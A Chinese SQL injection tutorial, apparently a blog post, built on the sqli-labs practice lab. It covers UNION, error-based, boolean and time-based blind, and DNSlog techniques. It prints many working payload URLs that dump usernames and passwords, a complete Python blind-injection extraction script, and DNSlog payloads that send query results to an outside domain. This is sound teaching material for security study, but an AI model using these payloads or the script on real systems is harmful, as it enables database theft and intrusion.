川邮之光
川邮之光

SQL注入(一)-基础

SQL注入-基础

  • 前言
  • SQL注入的步骤(必看)
  • GET请求注入
    • union注入
      • 1、涉及的mysql函数
      • 2、union注入案例
    • 报错注入
      • 一、Extractvalue报错注入
        • 1、extractvalue报错涉及到的Mysql函数
        • 2、Extractvalue报错注入案例:
      • 二、updateXML报错注入
        • 1、updateXML报错涉及设计的函数
        • 2、updateXML报错案例:
      • 三、floor报错注入
        • 1、floor报错注入涉及的函数
        • 2、floor报错注入案例:
    • 盲注
      • 一、布尔盲注
        • 1、布尔盲注涉及的函数
        • 2、布尔盲注案例
        • 3、布尔盲注脚本(Python)
      • 二、时间盲注
        • 1、时间盲注涉及的函数
        • 2、时间盲注案例
        • 3、时间盲注脚本(Python)
    • Mysql文件读写
      • 一、PHP小皮配置Mysql文件读写权限
      • 二、 DNSlog注入( load_file)
        • 1、DNSlog注入涉及的函数
        • 2、DNSlog注入案例
      • 三、文件上传into outfile(一句话木马)
        • 1、文件上传涉及的知识点
        • 2、文件上传(一句话木马)案例
  • POST注入
    • 一、POST请求方法之union注入
    • 二、POST请求方法之报错注入
    • 三、POST请求方法之盲注
    • 四、POST dnslog注入

前言

什么是SQL注入:
SQL注入是程序对用户输入数据的合法性没有进行处理和判断,导致攻击者可以在web应用程序事先定义好的sql语句中添加额外的sql语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器来执行非授权的任意查询,查看未被授权的数据。

SQL注入的步骤(必看)

SQL注入的步骤(必看)
备:(以下的6步是笔者请求行业大佬加上自己总结出来的通用6步方法)
第一步:
找注入点 (任何与后端数据库交互的地方,请求参数,http头部cookie字段等等)通常用单引号(')去试探
第二步:
判断注入格式(整形/字符型)
判断注入类型(报错,盲注xx)
判断数据库类型(Mysql、MS_SQLserver、Oracle)
第三步:
构造闭合(通过闭合构造后端执行的自定义的sql语句)
整型的闭合为(空白)
第四步:
判断表的行数
第五步:
判断回显位置(时间盲注或布尔盲注没有回显)
例如:当页面出现报错信息我们可以判断它是union注入 | 报错注入
在这里插入图片描述
在页面专门输入一个错误的信息他不回显,大概率就是盲注
SQL注入(一)-基础_第1张图片

第六步:
先查库名、表名、字段名
然后{判断自己需要的数据,如账号密码表等)

GET请求注入

GET请求:我们一切的操作都在请求行即(URL)中进行注入

union注入

1、涉及的mysql函数

UNION:联合查询
ORDRR BY:排序
GROUP BY:分组
SELECT:查询
GROUP_CONCAT:将组中的字符串连接成为具有各种选项的单个字符串

2、union注入案例

环境:sqli-1

第一步:找到注入点并输入1‘探测是否存在sql注入
注入方式:GET(请求方法)

http://192.168.101.166/sqli/Less-1/?id=1'

SQL注入(一)-基础_第2张图片
第二步:判断注入类型、注入方法、数据库类型
注入方法: UNION注入
数据库类型判断: MYSQL数据库
注入类型判断: 字符型

方法一:
1=1:回显
1=2:回显
两个都回显说明是字符型

http://192.168.101.166/sqli/Less-1/?id=1 and 1=1

SQL注入(一)-基础_第3张图片

http://192.168.101.166/sqli/Less-1/?id=1 and 1=2

SQL注入(一)-基础_第4张图片

1=1/1=2都能正常回显出内容,所以这是一个典型的字符型

第三步:判断闭合方式(整型直接跳过这一步)

常见的闭合有以下几种:

" ') ")

这里正确的闭合方式是 '(单引号)

http://192.168.101.166/sqli/Less-1/?id=1'--+

SQL注入(一)-基础_第5张图片
第四步:判断表的列数
判断方法: order by 或者 group by (order by 和group by的用法相同这里我使用order by来演示)

http://192.168.101.166/sqli/Less-1/?id=1' order by 3--+

SQL注入(一)-基础_第6张图片
所以我们用3来试探一下

http://192.168.101.166/sqli/Less-1/?id=1' order by 3--+

SQL注入(一)-基础_第7张图片
第五步:判断回显的位置

在第四步我们确定了表的列数,所以这一步我们来判断哪一列可以回显数据

http://192.168.101.166/sqli/Less-1/?id=1' union select 1,2,3--+

SQL注入(一)-基础_第8张图片
第六步:爆库名

从上一步我们判断了回显位置是在2、3号位,所以我们接下来的暴库、爆表、爆字段等一系列操作都在2、3号位里面进行

http://192.168.101.166/sqli/Less-1/?id=-1' union select 1,database(),3--+

database():显示当前数据库名称
SQL注入(一)-基础_第9张图片
第七步:爆表名

爆表名设计的关键数据库和表名:(必背)
information_schema: 存放所有表和字段的数据库(非常非常重要)
例如:
SQL注入(一)-基础_第10张图片

tables: 存放所有的表 (它归information_schema数据库管)
例如:select table_name from information_schema.tables;
SQL注入(一)-基础_第11张图片

columns: 存放所有表的字段名 (它也归information_schema数据库管)
例如:select column_name from information_schema.columns;
SQL注入(一)-基础_第12张图片

介绍完上面的关键数据库和表名,接下来我们进入正题:

http://192.168.101.166/sqli/Less-1/?id=-1' union select 1,(select Group_concat(table_name) from information_schema.tables where table_schema=database()),3--+

代码里面的Group_concat()
SQL注入(一)-基础_第13张图片
通过上图我们拿到了以下表格:
emails | referers | uagents | users | xm
拿到以上表名,让我们在第八步中爆字段名就容易了

第八步:获取字段名

这里我选择看 users 这张表的字段名

http://192.168.101.166/sqli/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),3 --+

SQL注入(一)-基础_第14张图片

通过以上步骤我们爆出users这张表里面的字段:
id,username,password 接下来我们就可以看它的密码、账号

第九步:拿取账号、密码

http://192.168.101.166/sqli/Less-1/?id=-1' union select 1,(select group_concat(username,'==>',password) from users),3 --+

SQL注入(一)-基础_第15张图片

到此我们union注入就结束了

报错注入

常见的报错注入有以下三种:
Extractvalue | updateXML | Floor

一、Extractvalue报错注入

1、extractvalue报错涉及到的Mysql函数

涉及到的函数:
Extarctvalue(列名,查询的内容):从目标XML中返回包含所查询值的字符串。
备注:输出字符长度限制为32个字符
例如:select extarctvalue(name,'/boor/html') from tables 从name这个字段里面查找’/boor/html’字符串
concat:拼接字符串
例如:select concat('我爱','中国');
SQL注入(一)-基础_第16张图片
Substring(总的内容,从哪里开始显示,显示几个字符):
例如:select substring('abc',1,1);
SQL注入(一)-基础_第17张图片

2、Extractvalue报错注入案例:

第一步:判断注入点(以及是否存在sql注入)

http://192.168.101.175/sqli/Less-5/?id=1'

SQL注入(一)-基础_第18张图片
第二步:判断类型、闭合、数据库、格式
类型:报错注入
格式:字符型
数据库:Mysql

http://192.168.101.175/sqli/Less-5/?id=1 and 1=2--+

SQL注入(一)-基础_第19张图片

http://192.168.101.175/sqli/Less-5/?id=1 and 1=1--+

SQL注入(一)-基础_第20张图片

通过and 1=1 | and 1=2页面都会正常回显所以基本可以确定这是一个字符型的注入

第三步:判断闭合符号

http://192.168.101.175/sqli/Less-5/?id=1' and 1=1--+

SQL注入(一)-基础_第21张图片

http://192.168.101.175/sqli/Less-5/?id=1' and 1=2--+

SQL注入(一)-基础_第22张图片

通过上面 1’ and 1=1(回显) | 1’ and 1=2(不回显)
基本可以确认它的闭合符号为单引号

第四步:判断列数

http://192.168.101.175/sqli/Less-5/?id=1' order by 3--+

通过笔者多次用二分法来判断,该表的列数为3列

SQL注入(一)-基础_第23张图片
第五步:判断回显位置

http://192.168.101.175/sqli/Less-5/?id=-1' union select 1,2,3--+

SQL注入(一)-基础_第24张图片

通过以上步骤页面是没有给我们回显1、2、3的,所以union方法就行不通了,我们可以尝试写入错误的函数来判断它是否存在报错注入

http://192.168.101.175/sqli/Less-5/?id=-1' union select 1,databass(),3--+

这里我们使用了错误的 databass() 来试探页面发现果然存在报错注入
SQL注入(一)-基础_第25张图片
所以接下来我们就用extractvalue函数进行暴库、爆表、爆字段

第六步:暴库

http://192.168.101.175/sqli/Less-5/?id=1' union select 1,2,(select extractvalue(1,concat(0x7e,(database()))))--+

SQL注入(一)-基础_第26张图片

第七步:爆表

http://192.168.101.175/sqli/Less-5/?id=1' union select 1,2,(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))--+

SQL注入(一)-基础_第27张图片

第八步:爆字段

通过上一个步骤我们拿到了以下表格:
emails | referers | uagents | users | xm
拿到以上表名,让我们在第八步中爆字段名就容易了

http://192.168.101.175/sqli/Less-5/?id=1' union select 1,2,(select extractvalue(1,(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')))))--+

SQL注入(一)-基础_第28张图片

通过上一步爆破字段名,我们拿到了 id | username | password 这些字段
接下来我们直接开始爆破密码账号,但是下一步中我们要用到一个关键的函数substring()因为extractvalue()函数只回显32个字符,所以要想拿到全部的账号密码我们就要结合substring函数来爆破

第九步:爆账号密码

显示前31个字符

http://192.168.101.175/sqli/Less-5/?id=1' union select 1,2,(select extractvalue(1,substring(concat(0x7e,(select group_concat(username,'=',password) from users)),1,31)))--+

SQL注入(一)-基础_第29张图片

显示后31个字符

http://192.168.101.175/sqli/Less-5/?id=1' union select 1,2,(select extractvalue(1,substring(concat(0x7e,(select group_concat(username,'=',password) from users)),32,61)))--+

SQL注入(一)-基础_第30张图片

到此我们extractvalue报错就结束了
下一节updateXML报错

二、updateXML报错注入

1、updateXML报错涉及设计的函数

updateXML(列名,路径,替换路径的内容)
例如:在xml数据库中有张dom表里面存在data字段
SQL注入(一)-基础_第31张图片
这里我们在路径里面添加他就会把线后面的类容给我们回显
在这里插入图片描述

2、updateXML报错案例:

第一步:判断注入点

http://192.168.119.134/sqli/Less-5?id=1'

SQL注入(一)-基础_第32张图片

输入单引号会报错 所以它存在SQL注入

第二步:判断类型(整型/字符型) | 闭合方式

payload_1:
http://192.168.119.134/sqli/Less-5?id=1' and 1=2--+
payload_2:
http://192.168.119.134/sqli/Less-5?id=1' and 1=1--+

SQL注入(一)-基础_第33张图片
SQL注入(一)-基础_第34张图片

从上面两个payload我们可以得出两个重要信息:
1、这道题是字符类型,闭合方式是单引号、数据库是mysql
2、有回显,所以可以排除盲注的可能性了

第三步:判断列数

payload_1:
http://192.168.119.134/sqli/Less-5?id=1' order by 3--+
payload_2:
http://192.168.119.134/sqli/Less-5?id=1' order by 4--+

SQL注入(一)-基础_第35张图片
SQL注入(一)-基础_第36张图片

从上面两个payload中得到Order by 3正常回显 Order by 4 报错所以我们可以得出他有3列数据

第四步:判断注入方式

payload_1:
http://192.168.119.134/sqli/Less-5?id=-1' union select 1,2,3--+
payload_2:
http://192.168.119.134/sqli/Less-5?id=-1' union select 1,databass(),3--+

SQL注入(一)-基础_第37张图片
SQL注入(一)-基础_第38张图片

从第一个payload中我们可以从第一张图中得到,页面并没有变化,但是他又有回显,所以我们就可以大胆猜测他是一手报错注入,输入一个错误的database()果不其然他把数据库名称给我们回显出来了 所以我们接下来进行暴库 | 爆表 | 爆字段

第五步:拿数据库名

http://192.168.119.134/sqli/Less-5?id=-1' or updatexml(1,concat(0x7e,database()),3)--+

SQL注入(一)-基础_第39张图片

我们输入报错的payload在我们意料之中的报错了数据库名称 接下来我们爆表名

第六步:拿表名

payload_1:
http://192.168.119.134/sqli/Less-5?id=-1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),3)--+
payload_2:
http://192.168.119.134/sqli/Less-5?id=-1' or updatexml(1,concat(0x7e,substring((select group_concat(table_name) from information_schema.tables where table_schema=database()),32,61)),3)--+

SQL注入(一)-基础_第40张图片
在这里插入图片描述

第一张图我们可以很明显的看出他的表名没有显示完全,因为updatexml最多只回显前31个字符
所以我们这里用到一个新的函数substring(字符,开始位置,结束位置)
例如substring(database,1,3):只回显sub这三个字符

第七步:爆字段名

http://192.168.119.134/sqli/Less-5?id=-1' or updatexml(1,concat(0x7e,substring((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,31)),3)--+

SQL注入(一)-基础_第41张图片

从上面的payload中我们的出users表的所有字段名,所以接下来我们进行查看这些字段里面有哪些内容

第八步:爆显示的内容

paylaod_1:
http://192.168.119.134/sqli/Less-5?id=-1' or updatexml(1,concat(0x7e,substring((select group_concat(username,password) from users),1,31)),3)--+
payload_2:
http://192.168.119.134/sqli/Less-5?id=-1' or updatexml(1,concat(0x7e,substring((select group_concat(username,password) from users),32,61)),3)--+

SQL注入(一)-基础_第42张图片
SQL注入(一)-基础_第43张图片

从上面两张图中我们只用改变substring(1,2,3)中的2 | 3号位来修改要查看内容的不同位置
到此我们updatexml报错注入就学完啦

三、floor报错注入

1、floor报错注入涉及的函数

floor():向下取整函数
例如:select floor(1.5);
SQL注入(一)-基础_第44张图片
rand():随机返回0-1之间的小数
例如:select rand();
SQL注入(一)-基础_第45张图片
concat_ws():把括号内的数据用第一个字段连接起来
例如:select concat_ws(0x7e,2,3);0x7e = ~
SQL注入(一)-基础_第46张图片
group by:分组
例如:select count(sex) from users group by sex;
as:起别名
例如:select count(*) as a from users;
SQL注入(一)-基础_第47张图片
count():计数
例如:select count(*) from users;
SQL注入(一)-基础_第48张图片
limit(查看第几行,行数):显示指定行数
例如:显示第二行select * from security.users limit 1,1;
SQL注入(一)-基础_第49张图片

2、floor报错注入案例:

第一步:判断注入点

http://192.168.119.134/sqli/Less-6?id=1"

SQL注入(一)-基础_第50张图片

从上面的报错信息中我们可以得出他的闭合方式为双引号

第二步:判断列数

payload_1:
http://192.168.119.134/sqli/Less-6?id=1" group by 3--+
payload_2:
http://192.168.119.134/sqli/Less-6?id=1" group by 4--+

SQL注入(一)-基础_第51张图片
SQL注入(一)-基础_第52张图片

从上面的两个payload中我们可以很清晰的得出他有3列

第三步:判断攻击方式

payload_1:
http://192.168.119.134/sqli/Less-6?id=-1" union select 1,2,3--+
payload_2:
http://192.168.119.134/sqli/Less-6?id=-1" union select 1,databass(),3--+

SQL注入(一)-基础_第53张图片
SQL注入(一)-基础_第54张图片

从第一个payload中我们可以从第一张图中得到,页面并没有变化,但是他又有回显,所以我们就可以大胆猜测他是一手报错注入,输入一个错误的database()果不其然他把数据库名称给我们回显出来了 所以我们接下来进行暴库 | 爆表 | 爆字段

第四步:暴库

http://192.168.119.134/sqli/Less-6?id=-1" union select 1,count(*),concat_ws(0x7e,database(),floor(rand(0)*2)) as x from information_schema.tables group by x--+

SQL注入(一)-基础_第55张图片
第五步:暴表

http://192.168.119.134/sqli/Less-6?id=-1" union select 1,count(*),concat_ws(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2)) as x from information_schema.tables group by x--+

SQL注入(一)-基础_第56张图片
第六步:爆字段

http://192.168.119.134/sqli/Less-6?id=-1" union select 1,count(*),concat_ws(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),floor(rand(0)*2)) as x from information_schema.tables group by x--+

SQL注入(一)-基础_第57张图片
第七步:爆密码账号

方法一;
http://192.168.119.134/sqli/Less-6?id=-1" union select 1,count(*),concat_ws(0x7e,(select concat(username,'=',password) from users limit 1,1),floor(rand(0)*2)) as x from information_schema.tables group by x --+
方法二:
http://192.168.119.134/sqli/Less-6?id=-1" union select 1,count(*),concat_ws(0x7e,(select substring((group_concat(username,'=',password)),31,61) from users),floor(rand(0)*2)) as x from information_schema.tables group by x --+

SQL注入(一)-基础_第58张图片
SQL注入(一)-基础_第59张图片

第一个payload是使用limit函数来控制回显内容
第二个payload是使用substring函数来控制回显内容
到此floor注入就完了

盲注

一、布尔盲注

1、布尔盲注涉及的函数

ASCII:将字母转换对应的数字
例如:select ascii('a');
SQL注入(一)-基础_第60张图片
Substr(1,2,3):1:字符串 2:从哪里开始 3:显示几位数字
例如:select substr("abc",2,1);
SQL注入(一)-基础_第61张图片
length:判断长度
例如:select length("abc");
SQL注入(一)-基础_第62张图片
limit:控制要回显的位置

2、布尔盲注案例

第一步:判断注入点

payload_1:
http://192.168.2.101/sqli/Less-8?id=1'
payload_2:
http://192.168.2.101/sqli/Less-8?id=1'--+

SQL注入(一)-基础_第63张图片
SQL注入(一)-基础_第64张图片

从上面两个payload中,我们可以观察出当输入1’的时候页面没有任何的回显,当输入–+的时候页面回显正常数据,所以我们可以得到以下信息:
1、没有报错回显—》盲注
2、闭合方式位单引号
如果这里我们还不确定闭合符号是否为单引号时我们就可以使用and来判断
例如:
1‘ and 1=1--+ =====>回显
1' and 1=2--+ ===>不回显
当符合上面两种结论的时候我们就可以确认闭合方式为单引号了

第二步:判断数据库名的长度

payload_1:
1' and length(database())>=8--+
payload_2:
1' and length(database())>=9--+

SQL注入(一)-基础_第65张图片
SQL注入(一)-基础_第66张图片

我们判断数据库表名的长度大于等于8的时候,页面正常回显---->然后输入9的时候页面没有回显任何的东西 所以我们基本可以确定数据库名的长度为8位

第三步:爆库名

使用二分法来爆破数据库名:
http://192.168.2.101/sqli/Less-8?id=1' and ascii(substr(database(),1,1))=115--+
http://192.168.2.101/sqli/Less-8?id=1' and ascii(substr(database(),2,1))=101--+
http://192.168.2.101/sqli/Less-8?id=1' and ascii(substr(database(),3,1))=99--+
http://192.168.2.101/sqli/Less-8?id=1' and ascii(substr(database(),4,1))=117--+
http://192.168.2.101/sqli/Less-8?id=1' and ascii(substr(database(),5,1))=115--+
http://192.168.2.101/sqli/Less-8?id=1' and ascii(substr(database(),6,1))=114--+
http://192.168.2.101/sqli/Less-8?id=1' and ascii(substr(database(),7,1))=104--+
http://192.168.2.101/sqli/Less-8?id=1' and ascii(substr(database(),8,1))=116--+
http://192.168.2.101/sqli/Less-8?id=1' and ascii(substr(database(),9,1))=121--+

SQL注入(一)-基础_第67张图片

通过以上的方法我们可以得出数据库名为:security
后面的步骤:先拿表名的个数 | 每个表名的长度 | 爆破表名 | 表中的字段总数 | 单个字段的数量 | 爆破字段名 | 判断有多少行数据 | 每个数据有多长 | 爆破数据
下面我们直接上脚本

3、布尔盲注脚本(Python)
import requests,re
import os
url = "http://192.168.2.101/sqli/Less-8"
close = "'" #输入闭合符号
"""判断数据库长度"""
global length
def database_length(url):
    for x in range(1000):
        params = {
            "id" : f"1{close.strip()} and length(database())={x}#"
        }
        response = requests.get(url=url,params=params)
        html = response.text
        if "You are in" in html:
            global length
            length = x 
            print(f'数据库名的长度为:{length}')
            break

"""爆破数据库名"""
database = ''#存放数据库名
def database_name(url):
    global length
    print("-----------+现在开始爆破数据库名:+-----------")
    for length in range(1,int(length)+1):
        for y in range(1000):
            params = {
                'id':f"1{close.strip()} and ascii(substr(database(),{length},1))={y}#"
            }
            response = requests.get(url=url,params=params)
            html = response.text
            if "You are in" in html:
                global database
                database += chr(y)
                print(f"第{length}位:{chr(y)}")
                break
    print("爆破完毕!")
    print(f"数据库名为:{database}")

"""表的数量"""
global table_sum
def table_count(url):
    for y in range(1,200):
        params = {
            "id":f"1{close.strip()} and (select count(table_name) from information_schema.tables where TABLE_SCHEMA = '{database}')={y}#"
        }
        response = requests.get(url=url,params=params)
        html = response.text
        if "You are in" in html:
            global table_sum
            table_sum = y
            print(f'{database}数据库中表的总数为:{table_sum}')
            break

"""表名的长度"""
table_lengths = {}
def tables_length(url):
    print('-----------+现在开始爆破每张数据表的长度:+-----------')
    for x in range(table_sum):
        for y in range(1000):
            params = {
                'id':f"1{close.strip()} and length((select table_name from information_schema.tables where table_schema='{database}' limit {x},1))={y}#"
            }
            resposne = requests.get(url=url,params=params)
            html = resposne.text
            if "You are in" in html:
                table_lengths[f"{x}"] = y
                print(f"第{x+1}张表的长度为:{y}")
                break
    print('爆破结束!')

"""爆破表名"""
table_name_dic = {}
def tables_name(url):
    print('-----------+现在开始爆破每张数据表的表名:+-----------')
    for x in table_lengths:
        table_name = ""
        for y in range(1,table_lengths[x]+1):
            for z in range(1000):
                params = {
                    'id':f"1{close} and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {x},1),{y},1))={z}#"
                }
                resposne = requests.get(url=url,params=params)
                html = resposne.text
                if "You are in" in html:
                    table_name += chr(z)
                    print(f"第{int(x)+1}张表的第{y}个字段为:{chr(z)}")
                    break
        table_name_dic[f'{x}'] = table_name
    print("爆破结束!")

"""判断表中字段的数量"""
column_sum_dic = {}
def column_sum(url):
    print('-----------+现在开始爆破每张表的字段总数:+-----------')
    for table in table_name_dic.values():
        for y in range(1000):
            params = {
                'id':f"1{close} and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='{table}')={y}#"
            }
            resposne = requests.get(url=url,params=params)
            html = resposne.text
            if "You are in" in html:
                column_sum_dic[table] = y
                print(f"{table}表的字段数为:{y}")
                break
    print("爆破结束!")

"""爆破字段名的长度"""
column_dic={}
def column_length(url):
    print('-----------+现在开始爆破每张表的字段名长度:+-----------')
    for table in column_sum_dic:
        column_list = []
        for y in range(column_sum_dic[table]):
            for x in range(1000):
                params = {
                    'id':f"1{close} and length((select column_name from information_schema.columns where table_name='{table}' and table_schema=database() limit {y},1))={x}#"
                }
                resposne = requests.get(url=url,params=params)
                html = resposne.text
                if "You are in" in html:
                    print(f"{table}中的第{y+1}个字段的数量为:{x}")
                    column_list.append(x)
                    break
        column_dic[table] = column_list
    print('爆破结束!')

"""爆破字段名"""
name_dic = {}#存放表名和字段名
def column_name(url):
    print('-----------+现在开始爆破每张表的字段名:+-----------')
    for table in column_dic:
        names = []
        for lis in range(0,len(column_dic[table])):
            cname = ''
            for x in range(1,column_dic[table][lis]+1):
                for y in range(1000):
                    params = {
                        'id':f"1{close} and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='{table}' limit {lis},1),{x},1))={y}#"
                    }
                    resposne = requests.get(url=url,params=params)
                    html = resposne.text
                    if "You are in" in html:
                        cname += chr(y)
                        print(f"{table}表中的第{lis+1}个字段中的第{x}位为:{chr(y)}")
                        break
            names.append(cname)
        name_dic[table] = names

"""爆破内容"""
cname_dic = {}
def conent(url):
    for table in name_dic:
        cname = ''
        table_copy = ''
        for x in name_dic[table]:
            table_copy += f" {x}"
        p = table_copy.strip()
        re_p = re.sub(' ',',',p)
        for y in range(1000):
            params = {
                'id':f"1{close} and (select length((select group_concat({re_p}) from {table})))={y}#"
            }
            response = requests.get(url=url,params=params)
            html = response.text
            if "You are in" in html:
                print(f"{table}表中的共有字符总数:{y}")
                for z in range(1,y+1):
                    for m in range(1000):
                        params = {
                            "id":f"1{close} and ascii(substr((select group_concat({re_p}) from {table}),{z},1))={m}#"
                        }
                        response = requests.get(url=url,params=params)
                        html = response.text
                        if "You are in" in html:
                            cname += chr(m)
                            print(f"{table}表第{z}个字符为:{chr(m)}")
                            break
                break 
        cname_dic[table] = cname    

if __name__ in "__main__":
    database_length(url=url)
    database_name(url=url)
    table_count(url=url)
    tables_length(url=url)
    tables_name(url=url)
    print(table_name_dic)
    column_sum(url=url)
    column_length(url=url)
    print(column_dic)
    column_name(url=url)
    print(name_dic)
    conent(url=url)
    print(cname_dic)
    os.system("cls")
    n = ''
    print("------------数据库名------------")
    print(database)
    print("------------表名=字段名------------")
    for table in name_dic:
        for y in name_dic[table]:
            n += f" {y}"
            n = n.strip()
            p = re.sub(' ','|',n)
        print(f"{table}--->{p}")
    print("------------数据------------")
    for table in cname_dic:
        print(f"----{table}----")
        if cname_dic[table] == '':
            print('无数据')
        else:
            print(cname_dic[table])

二、时间盲注

原理:Web页面只返回一个正常页面,利用页面响应时间不同,逐个猜解数据

1、时间盲注涉及的函数

Sleep():参数为休眠时长,以秒为单位,可以为小数
if(1,2,3):1条件,2真,3假
例如:select if(1=2,1,2);
在这里插入图片描述
1=2条件为假,所有mysql返回2
ASCII:将字母转换对应的数字
例如:select ascii('a');
SQL注入(一)-基础_第68张图片
Substr(1,2,3):1:字符串 2:从哪里开始 3:显示几位数字
例如:select substr("abc",2,1);
SQL注入(一)-基础_第69张图片
length:判断长度
例如:select length("abc");
SQL注入(一)-基础_第70张图片
limit:控制要回显的位置

2、时间盲注案例

第一步:判断注入点

payload_1:
http://192.168.101.191/sqli/Less-9?id=1'--+
payload_2:
http://192.168.101.191/sqli/Less-9?id=1'

SQL注入(一)-基础_第71张图片

这里我们不管输入1’ | 1"页面都没有任何反应
在这里插入图片描述
从上图中可以看出sql语句的闭合方式就是为单引号,但是网站又存在sql注入,所以我们可以总结出以下信息:
1、没有回显(排除报错注入 | union注入)
这里我们可以用dnslog注入 || 时间盲注 这里我们使用时间盲注来做

第二步:判断闭合方式

payload:
http://192.168.101.191/sqli/Less-9?id=1' and sleep(3)--+

SQL注入(一)-基础_第72张图片
SQL注入(一)-基础_第73张图片

从上图我们可以得出网请求了接近3秒钟才给我们返回响应包,所以这道题的闭合方式为单引号

第三步:判断数据库名的长度

payload:
http://192.168.101.191/sqli/Less-9?id=1' and if((select length(database()))=8,sleep(2),sleep(0))--+

SQL注入(一)-基础_第74张图片

这里返回的时间为2.01跟2很接近,所以数据库的长度为8

第四步:暴库名

payload:
http://192.168.101.191/sqli/Less-9?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),3)--+
http://192.168.101.191/sqli/Less-9?id=1' and if(ascii(substr(database(),2,1))=101,sleep(2),3)--+
http://192.168.101.191/sqli/Less-9?id=1' and if(ascii(substr(database(),3,1))=99,sleep(2),3)--+
                      |
                      |
                      V
http://192.168.101.191/sqli/Less-9?id=1' and if(ascii(substr(database(),8,1))=121,sleep(2),3)--+

通过控制substr中的第二参数来调整数据名的位数,进行依次爆破每个字母的值
然后对照ascii表爆出数据名为:security

后面的步骤就不一一演示了,因为和上面的方法类似
后面的步骤为:判断表的个数 | 判断表的数量 | 判断表名的长度 | 爆破表名 | 判断单张表中字段的总数 | 判断字段的长度 | 爆破字段名 | 爆破内容

3、时间盲注脚本(Python)

Mysql文件读写

一、PHP小皮配置Mysql文件读写权限

第一步打开my.ini文件
SQL注入(一)-基础_第75张图片
进入MysqL文件夹下面点击my.ini
SQL注入(一)-基础_第76张图片
SQL注入(一)-基础_第77张图片
第二步:修改secure_file_priv=空白
如果页面中有secure_file_priv就直接修改,没有就添加进去
SQL注入(一)-基础_第78张图片

二、 DNSlog注入( load_file)

1、DNSlog注入涉及的函数

使用DNSlog注入前提是数据库配置文件中的secure_file_priv开启了的并且注入方式为union
使用show variables like '%secure%'来查看mysql是否具有文件读写权限
SQL注入(一)-基础_第79张图片
secure_file_priv:null—>不能读写
secure_file_priv:c:\\—>只能在c盘中读取
secure_file_priv:空白—>可以任意读写

load_file(路径):读取文件[不仅可以读取本地文件,还可以读取网上的文件]
例如:select load_file("//127.0.0.1/123/phpinfo.php")
这里还要用到一个DNSlog网站 传送门
SQL注入(一)-基础_第80张图片

2、DNSlog注入案例

因为笔者睡了一天后发现第一个Dnslog网站打不开了,所以接下来的案例用下面这个转送门来进行讲解
去DNSlog网站申请一个子域名网址传送门
这里打开DNSlog网页(也就是上面的传送门)我们就可以看见子域名信息

SQL注入(一)-基础_第81张图片
第一步:判断注入点

http://192.168.2.101/sqli/Less-7?id=1'))
http://192.168.2.101/sqli/Less-7?id=1'))--+

SQL注入(一)-基础_第82张图片
SQL注入(一)-基础_第83张图片

这里我们输入第一个payload的时候页面给我们提示错误,然后我们添加–+注释掉多余的部分后,页面正常回显 通过以上两个payload我们可以得出以下结论:
1、闭合方式为"))
2、有回显的内容

第二步:判断列数

http://192.168.2.101/sqli/Less-7?id=1')) group by 3--+
http://192.168.2.101/sqli/Less-7?id=1')) group by 4--+

SQL注入(一)-基础_第84张图片
SQL注入(一)-基础_第85张图片

第一个payload不报错,然后我们第二个payload输入4列网页报错,所以基本我们可以肯定它有3列数据 接下里我们直接上union注入

第三步:

payload_1:
http://192.168.2.101/sqli/Less-7?id=-1')) union select 1,2,3--+
payload_2:
http://192.168.2.101/sqli/Less-7?id=-1')) union select 1,databass(),3--+

SQL注入(一)-基础_第86张图片
SQL注入(一)-基础_第87张图片

从上面两个payload中我们可以得出以下结论:
1、union注入没有反应
2、报错注入也没有反应(所以这道题绝对不是报错)
一般遇到这种情况我们就可以考虑用盲注或者DNSlog注入了这里我们用DNSlog注入

第四步:使用DNSlog注入获取数据库名

语法:load_file(concat('//',(注入的语句),".子域名/a.txt"))
load_file(concat('//',database(),'.6e366741.ipv6.1433.eu.org/a.txt'))
?id=-1')) union select 1,2,load_file(concat('//',database(),'.6e366741.ipv6.1433.eu.org/a.txt'))--+

然后我们输入payload后去dnslog网站刷新就会看见数据库的表名

SQL注入(一)-基础_第88张图片

SQL注入(一)-基础_第89张图片
第五步:获取表名

http://192.168.2.101/sqli/Less-7/?id=-1')) union select 1,2,load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.6e366741.ipv6.1433.eu.org/a.txt'))--+

SQL注入(一)-基础_第90张图片
SQL注入(一)-基础_第91张图片

我们输入payload后提交,然后去dnslog上面刷新就会看见一张表的信息,因为我们这里是用limit来控制输出的,如果要看第二张表的话我们就把payload中的limit 0,1修改成limit 1,1
例如:
SQL注入(一)-基础_第92张图片
SQL注入(一)-基础_第93张图片
用以上的方法我们就可以拿到全部的数据表

第六步:获取字段名

http://192.168.2.101/sqli/Less-7/?id=-1')) union select 1,2,load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() andtable_name='users' limit 0,1),'.6e366741.ipv6.1433.eu.org/a.txt'))--+

SQL注入(一)-基础_第94张图片
在这里插入图片描述

同过上面的payload然后修改limit就可以获得表中全部的字段

第七步:获取表中的内容

密码payload:
http://192.168.2.101/sqli/Less-7/?id=-1')) union select 1,2,load_file(concat('//',(select password from users limit 1,1),'.6e366741.ipv6.1433.eu.org/a.txt'))--+
账号payload:
http://192.168.2.101/sqli/Less-7/?id=-1')) union select 1,2,load_file(concat('//',(select username from users limit 1,1),'.6e366741.ipv6.1433.eu.org/a.txt'))--+

SQL注入(一)-基础_第95张图片
在这里插入图片描述

通过上面的payload也和上面的步骤一样控制limit函数我们就可以拿到全部的账号和密码了

三、文件上传into outfile(一句话木马)

1、文件上传涉及的知识点

sql文件写入一句话木马的前提条件和DNSlog注入一样

1、@@datadir:显示mysql文件夹的路径
例如:select @@datadir
SQL注入(一)-基础_第96张图片
2、into outfile:写入文件命令
例如:select "" into outfile "C:\\phpstudy_pro\\www\\phpinfo.php"
在这里插入图片描述
